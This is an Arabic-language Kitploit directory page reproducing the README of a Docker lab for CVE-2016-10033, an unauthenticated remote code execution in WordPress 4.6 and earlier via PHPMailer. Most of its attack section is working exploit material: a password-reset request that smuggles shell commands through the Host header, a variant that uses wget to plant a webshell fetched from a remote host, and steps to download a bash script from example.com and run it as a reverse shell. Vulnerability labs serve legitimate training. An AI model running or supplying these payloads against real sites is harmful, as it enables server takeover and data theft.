Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WP-CVE-2016-10033 — بيئة مختبرية قائمة على Docker لتنفيذ الأكواد عن بُعد في ووردبريس <= 4.6 عبر PHPMailer (CVE-2016-10033)، بما في ذلك إثبات المفهوم (PoC)، رفع الويب شيل، وحمولات الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/liusec/wp-cve-2016-10033
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولاتمختبرات وتدريب عملي
GitHubliusec/wp-cve-2016-10033

WP-CVE-2016-10033

بيئة مختبرية قائمة على Docker لتنفيذ الأكواد عن بُعد في ووردبريس <= 4.6 عبر PHPMailer (CVE-2016-10033)، بما في ذلك إثبات المفهوم (PoC)، رفع الويب شيل، وحمولات الصدفة العكسية.

عرض المستودع
13منذ 9 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WordPress <= 4.6 ثغرة تنفيذ الأوامر (PHPMailer) (CVE-2016-10033)

معلومات الثغرة

WordPress هي منصة تدوين تم تطويرها باستخدام لغة PHP، حيث يمكن للمستخدمين إنشاء مواقعهم الخاصة على خوادم تدعم PHP وقاعدة بيانات MySQL. يمكن أيضًا استخدام WordPress كنظام لإدارة المحتوى (CMS). يستخدم WordPress مكوّن PHPMailer لإرسال رسائل البريد الإلكتروني إلى المستخدمين. يحتوي PHPMailer (الإصدار < 5.2.18) على ثغرة تنفيذ أوامر عن بُعد؛ حيث يحتاج المهاجم فقط إلى صياغة عنوان بريد إلكتروني خبيث بمهارة لكتابة أي ملفات، مما يؤدي إلى تنفيذ أوامر عن بُعد.

الإصدارات المتأثرة

WordPress <= 4.6

معلومات الصورة

النوعاسم المستخدمكلمة المرور
Mysqlrootroot
/wp-admin/adminadmin123

تجهيز البيئة:

  1. اسحب الصورة إلى الجهاز المحلي
root@kitploit:~
$ docker pull medicean/vulapps:w_wordpress_6
  1. قم بتشغيل البيئة
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

الرقم 8000 الموجود قبل -p 8000:80 يمثل منفذ الجهاز الفعلي، ويمكن تحديده حسب الرغبة.

عند زيارة http://127.0.0.1:8000 ورؤية الواجهة الرئيسية لـ WordPress، فهذا يعني أن البيئة تم تشغيلها بنجاح

POC

على افتراض أن العنوان المستهدف هو: http://127.0.0.1:8000/

  1. انسخ رسالة HTTP التالية إلى BurpSuite Repeater، ثم اضغط على زر Go، وقم بتعبئة IP الهدف والمنفذ (على سبيل المثال، IP: 127.0.0.1 والمنفذ: 80)
root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. قم بزيارة: http://127.0.0.1:8000/vuln

تشير رؤية رمز الحالة 200 إلى أنه تم إنشاء ملف /var/www/html/vuln بنجاح

يمكنك زيارة هذا العنوان قبل إرسال الحزمة، وستظهر لك رسالة 404

Exp

الفكرة: أنشئ ملفًا نصيًا على خادم HTTP بعيد، ثم قم بتنزيله إلى الجهاز الهدف باستخدام wget

كتابة WebShell إلى الهدف (غير موصى به بشدة)

بما أنه يمكنك تنفيذ الأوامر بالفعل، فما الحاجة إلى نقل WebShell؟

  1. نفّذ الأمر التالي:
root@kitploit:~
/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php

ملاحظة:

  1. يجب ألا يحتوي URL البعيد على http://
  2. يجب أن تكون جميع الأحرف صغيرة (lowercase)
  3. استبدل جميع / بـ ${substr{0}{1}{$spool_directory}}
  4. استبدل جميع المسافات بـ ${substr{10}{1}{$tod_log}}

الرسالة كما يلي (استبدل user_login حسب الحالة الفعلية، القيمة الافتراضية هي admin):

root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. قم بزيارة http://127.0.0.1:8000/webshell.php

شل عكسية (موصى به)

إذا كان محتوى الملف النصي البعيد هو سكربت bash، فيمكنك بعد تنزيله إلى الهدف تنفيذ الملف مباشرة باستخدام /bin/bash

  1. قم بتنزيل سكربت bash إلى الهدف
root@kitploit:~
/usr/bin/wget --output-document /tmp/rce example.com/1.txt
  1. نفّذ
root@kitploit:~
/bin/bash /tmp/rce

روابط ذات صلة

  • WordPress Core 4.6 - Unauthenticated Remote Code Execution (RCE) PoC Exploit
تنزيل الأداة